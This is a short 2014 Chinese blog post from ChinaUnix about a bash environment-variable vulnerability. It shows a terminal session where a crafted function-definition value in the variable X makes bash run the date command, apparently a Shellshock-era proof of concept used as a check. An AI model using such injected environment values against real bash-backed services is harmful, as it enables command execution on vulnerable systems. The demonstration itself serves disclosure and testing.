一个linux下的bash安全漏洞-cxmfyl-ChinaUnix博客

个人简介

LoveMoney

文章分类

文章存档

2014年（148）

我的朋友

相关博文

一个linux下的bash安全漏洞

分类： LINUX

2014-09-28 17:18:16

1. 通过设置一个特殊的环境变量的env，能间接地查到到linux命令的属性，如下：

2. 一次运行环境变量。

[2014-09-27 13:01:27 david@davidcchen ~]$ zsh --version
zsh 4.3.10 (x86_64-redhat-linux-gnu)
[2014-09-27 13:03:24 david@davidcchen ~]$ bash --version
GNU bash, version 4.1.2(1)-release (x86_64-redhat-linux-gnu)
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software; you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
[2014-09-27 13:03:31 david@davidcchen ~]$ env X='() { (a)=>\' bash -c "echo date"; cat echo; rm echo
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
Sat Sep 27 13:03:52 CST 2014
---------->成功运行date命令
[2014-09-27 13:03:52 david@davidcchen ~]$

外部参考

阅读(1689) | 评论(0) | 转发(0) |

给主人留下些什么吧！~~

感谢所有关心和支持过ChinaUnix的朋友们